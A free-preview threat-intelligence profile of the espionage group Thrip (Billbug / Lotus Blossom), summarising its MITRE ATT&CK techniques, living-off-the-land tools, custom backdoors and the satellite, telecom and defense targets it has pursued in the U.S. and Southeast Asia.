3C-INT logo [Cyber]Crime Characterization for Intelligence FREE PREVIEW
You are exploring the Free preview. To unlock full read-only access to all public profiles and in-app notifications, create a free research account. For analyst / premium plans capabilities (editing, advanced tabs, exports), please contact us

Threat Actor Characterization

Back
You’re viewing the read-only version. Sign in for analyst tools (editors, promote draft, file/relations management, etc.)
Thrip

Thrip

ID: 3679225d7813542c3da5765e9b2088b705661
Cybercrime State-Sponsored
Threat types: Espionage, Intrusion, ICS Compromise, Living-off-the-land
Unknown HKG, IDN, MAC, MYS, PHL, VNM
Updated: 2026-01-26
Created: 2025-10-22
Progress: 61% Completeness: 57% Freshness: 70%
Operation zone: Hong Kong, Indonesia, Macao, Malaysia, Philippines, Vietnam
Aliases Limited alias preview
Billbug Lotus Blossom
Actor Network Graph
Open Network Graph
Read-only preview for anonymous visitors. Sign in with a free Research account for full workspace.
MITRE ATT&CK®
confidence: high
Actor Techniques page ATT&CK® Diagram

Thrip (G0076) is an espionage group targeting satellite, telecom, geospatial-imaging, and defense organizations in the U.S. and Southeast Asia, using living-off-the-land tools (PowerShell, PsExec, WinSCP, LogMeIn) alongside custom backdoors (Catchamas, Hannotog, Sagerunex); Symantec later tracks the activity as Billbug.


Technique Technique name Tactics Evidence
T1059.001 PowerShell TA0002
  • 2018-06-19 — PowerShell used to download payloads, traverse networks, and perform reconnaissance within victim environments. · ref
T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol TA0010
  • 2018-06-19 — Data exfiltration over FTP using WinSCP observed at a targeted organization. · ref
T1588.002 Tool TA0042
  • 2018-06-19 — Group obtained and used dual-use tools including Mimikatz and PsExec during operations. · ref
T1219.002 Remote Desktop Software TA0011
  • 2018-06-19 — Use of cloud-based remote access software LogMeIn during intrusions. · ref
T1021.002 SMB/Windows Admin Shares TA0008
  • 2018-06-19 — PsExec leveraged for lateral movement and remote service execution across victim networks. · ref
Strategic Intelligence
Limited preview
Last updated: 2025-10-23T15:37:04+00:00
THRIP — Living-off-the-land espionage targeting satellite, telecom, and defense

CLASSIFICATION: Unclassified / Open Source


Executive Summary

Thrip (MITRE G0076) is an espionage group active since at least 2017–2018, publicly exposed by Symantec for operations against satellite communications, telecommunications, geospatial-imaging, and defense organizations in the United States and Southeast Asia. Thrip relies heavily on living-off-the-land tooling (PowerShell, PsExec, WinSCP, LogMeIn) alongside custom malware including Infostealer.Catchamas, and later Hannotog and Sagerunex. Activity included targeting systems that monitor and control satellites, indicating potential interest in operational disruption as well as collection. Symantec’s 2019 follow-up found continued campaigns across Hong Kong, Macau, Indonesia, Malaysia, the Philippines, and Vietnam; later analysis concluded Thrip overlaps with/equals “Billbug (aka Lotus Blossom)” and is tracked under that name going forward. Overall confidence in these core facts is high.


  • Industries/Sectors: Satellite communications; Telecommunications; Geospatial-imaging; Defense; (also military and maritime communications noted in 2019).
  • Geography (Region): United States and Southeast Asia.
  • Countries (if available): U.S.; targets observed across Hong Kong, Macau, Indonesia, Malaysia, the Philippines, Vietnam (2019).
  • Timeframe: 2017–2025 (first public exposure 2018-06-19; continued activity noted 2019-09-09; MITRE page last modified 2025-04-25).
Full strategic intelligence is available in Analyst and Premium plans.
Executive Analyst Brief for CISO
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Executive brief now
Saved successfully.
Hunting Playbook
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Hunting Playbook now
Saved successfully.
IOC Appendix
Empty Limited preview
No content yet.
IOC Appendix now
Saved successfully.
OSINT Library
Empty Limited preview
No content yet.
OSINT Library now
Saved successfully.
Social Medial & Communication
SOCMINT integrated: 0/0
No social links registered for this profile.
Notes: preview mode hides sensitive social/contact details.
Reference Images/Associated Evidence Limited
No images found for this threat.